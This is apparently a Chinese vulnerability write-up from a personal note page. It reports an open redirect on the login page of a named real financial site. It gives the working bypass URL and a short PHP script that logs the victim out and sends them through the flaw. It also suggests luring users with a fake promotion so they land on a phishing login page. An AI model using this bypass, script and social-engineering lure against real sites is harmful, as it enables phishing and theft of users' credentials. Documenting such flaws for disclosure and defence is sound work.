[关闭]
@1kbfree 2018-08-22T11:28:11.000000Z 字数 664 阅读 1263

金宝保登陆处存在任意Url跳转

漏洞挖掘


1、打开Url:https://www.5djbb.com/login?returnUrl=https://www.5djbb.com/site/index.html

image_1cle90u0e1gpdtjesr33cd102l9.png-444.9kB

2、因为这里是存在了验证的,但是不严谨,导致可以绕过,绕过的链接如下

  1. https://www.5djbb.com/login?returnUrl=http://www.baidu.com/?https://www.5djbb.com/

3、因为这个是要在没有登陆的情况下才可以,那么要写一个简单的脚本发送给用户,然后利用社工说这网站某某某处有什么活动可以领取什么,让他点开登陆(就算是登陆了还要重新登陆的话普通用户也不会发现有什么异常~),脚本如下

  1. <?php
  2. header( "Location:http://www.5djbb.com/site/logout" ); // 退出的链接
  3. header( "Location:https://www.5djbb.com/login.html?returnUrl=http://www.baidu.com/?https://shop.5djbb.com//member" ); // 然后跳转到www.baidu.com,假设这是一个模仿登陆的界面,那么就可以实现钓鱼
  4. ?>

4、然后打开脚本后会跳转到https://www.5djbb.com/login.html?returnUrl=http://www.baidu.com/?https://shop.5djbb.com//member,然后登陆一下

image_1clfqkftl1c6a1eo2nfdna999lp.png-529.9kB

image_1clfqm2nq18st18jtsp6kbmp3136.png-69.6kB

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注